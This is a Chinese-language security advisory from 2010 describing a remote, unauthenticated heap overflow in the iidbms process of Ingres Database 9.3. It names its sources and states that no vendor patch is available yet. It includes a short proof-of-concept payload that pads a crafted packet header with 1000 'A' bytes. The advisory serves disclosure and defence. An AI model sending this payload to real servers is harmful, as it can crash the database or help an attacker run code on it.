安全研究

安全漏洞
Ingres数据库iidbms进程堆溢出漏洞

发布日期:2010-01-29
更新日期:2010-02-01

受影响系统:
Ingres Corporation Ingres Database 9.3
描述:
BUGTRAQ  ID: 38001

Ingres是很多CA产品默认所使用的数据库后端。

未经认证的远程攻击者可以向Ingres数据库的iidbms进程发送恶意报文触发堆溢出,导致执行任意代码。

<*来源:Evgeny Legerov (aland@freeradius.org
  
  链接:http://intevydis.blogspot.com/2010/01/ingres-93-heap-overflow.html
        http://secunia.com/advisories/38358/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

s = "\x00\x00\x00\x00"
s += "\xff\xff\xff\xff"
s += "\x3c\x00\x00\x00\x06\x00\x00\x00"
s += "A" * 1000

建议:
厂商补丁:

Ingres Corporation
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ingres.com/index.php

浏览次数:2247
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障